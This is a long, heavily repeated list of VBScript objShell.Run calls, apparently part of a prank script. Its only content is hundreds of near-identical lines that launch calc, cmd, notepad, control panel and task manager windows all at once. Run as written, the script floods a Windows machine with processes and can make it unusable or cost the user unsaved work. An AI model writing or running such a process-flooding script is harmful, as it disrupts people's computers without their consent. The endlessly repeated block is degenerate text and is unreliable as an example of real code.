objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
